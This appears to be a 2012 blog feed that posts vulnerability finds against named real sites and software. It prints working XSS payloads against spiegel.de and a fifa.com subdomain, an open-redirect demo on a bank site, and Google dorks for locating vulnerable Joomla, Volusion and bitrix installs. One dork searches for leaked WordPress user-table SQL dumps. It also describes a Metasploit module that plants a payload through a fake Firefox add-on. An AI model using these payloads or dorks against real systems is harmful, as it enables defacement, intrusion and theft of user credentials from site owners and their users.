Friday, 11. May 2012
security.anti-abuse.com - xss
Date submitted: 14/12/2011
Date published: 10/05/2012

URL:
http://pastebin.com/mHjUghPv

by
Atmon3r

Permalink

 


Tuesday, 24. April 2012
spiegel.de - XSS
URL: http://www.spiegel.de/artikelversand/online/a-823270-de.html

POST: f.emailempfang=alert(navigator.userAgent)

by
watt

Permalink

 


Thursday, 12. April 2012
joomla (com_estateagent) - SQL
Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
Date: 10/04/2012
Author: xDarkSton3x
Category:: webapps
Google dork: inurl:"com_estateagent"

Permalink

 


Metasploit & Firefox Fake Extension (XPI)
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

Permalink

 


Sunday, 1. April 2012
fifa - XSS
Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E

by
TurKPoweR

Permalink

 


Monday, 26. March 2012
vBulletin 4.1.10 - XSS

vBulletin 4.1.10 XSS Vulnerability 2x from root and toor on Vimeo.

Permalink

 


Friday, 23. March 2012
Various Banks - XSS
Demo:
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com

Google Dork:
inurl:bitrix/rk.php

by
Sony and Flexxpoint

Permalink

 


Tuesday, 20. March 2012
Microsoft - XSS

Permalink

 


Saturday, 17. March 2012
WordPress - SQL
Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql

Permalink

 


Thursday, 15. March 2012
Volusion Chat - XSS
Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion

by
Sony

Permalink